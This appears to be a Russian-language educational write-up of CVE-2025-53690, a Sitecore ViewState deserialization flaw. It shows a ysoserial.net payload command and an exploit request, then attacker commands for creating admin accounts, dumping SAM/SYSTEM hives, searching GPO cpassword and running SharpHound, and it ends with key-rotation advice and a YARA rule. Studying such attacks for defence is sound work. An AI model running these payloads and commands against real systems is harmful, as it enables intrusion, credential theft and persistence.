
Это документы анализа CVE-2025-53690.
CVE-2025-53690 — это уязвимость десериализации ViewState, обнаруженная в семействе продуктов Sitecore, которая позволяет выполнить удаленный код, используя раскрытый machine key ASP.NET.
В основе этой уязвимости лежит неправильное управление конфигурацией:
ViewState — это функция управления состоянием в ASP.NET, которая:
__VIEWSTATE<!-- Пример web.config -->
<system.web>
<machineKey
validationKey="[64-байтовый ключ]"
decryptionKey="[48-байтовый ключ]"
validation="HMACSHA256"
decryption="AES" />
</system.web>
Target: /sitecore/blocked.aspx
Method: POST
Особенности: Доступна без аутентификации, использует ViewState
Злоумышленник использует известный machine key и ysoserial.net для создания вредоносной полезной нагрузки:
# Пример использования ysoserial.net
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[ключ]" --validationalg="HMACSHA256" --decryptionkey="[ключ]" --decryptionalg="AES"
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=[вредоносная_полезная_нагрузка]&__VIEWSTATEGENERATOR=[значение]
/sitecore/blocked.aspx# Выполненные команды
whoami
hostname
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"
Развернутые инструменты:
7za.exe: Инструмент для архивирования файловlfe.ico: Инструмент сетевого туннелирования EARTHWORM1.vbs: VBScript для выполнения команд# Создание учетной записи локального администратора
net user asp$ [пароль] /add
net localgroup administrators asp$ /add
net user sawadmin [пароль] /add
net localgroup administrators sawadmin /add
Сбор учетных данных:
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False
# Определение контроллера домена
nltest /DCLIST:[domain]
nslookup [domain-controller]
# Поиск cpassword в GPO (атака на Group Policy Preferences)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml
# Запуск BloodHound/SharpHound
sh.exe -c all
// Собираемая информация
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
Directories = new Information.Directories
{
CurrentWebDirectory = HostingEnvironment.MapPath("~/")
},
OperatingSystemInformation = Information.GetOperatingSystemInformation(),
DiskInformation = Information.GetDiskInformation(),
NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
Process = Information.GetProcessInformation()
};
Способ вывода: Скрытие данных под видом ViewState
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTcyODc4{AES шифрование + вывод в base64}" />
<!-- Создание уникального machine key -->
<machineKey
validationKey="[новый_64-байтовый_ключ]"
decryptionKey="[новый_48-байтовый_ключ]"
validation="HMACSHA256"
decryption="AES" />
# Пример YARA-правила (обнаружение WEEPSTEEL)
rule WEEPSTEEL_Detection {
strings:
$viewstate = "__VIEWSTATE"
$crypto = "System.Security.Cryptography"
$serializer = "JavaScriptSerializer"
condition:
all of them
}
CVE-2025-53690 — это яркий пример того, как простая ошибка конфигурации может привести к критической угрозе безопасности. Изучая эту уязвимость, обучающиеся могут ознакомиться с полным жизненным циклом реальной APT-атаки и понять современные методы атак и стратегии защиты.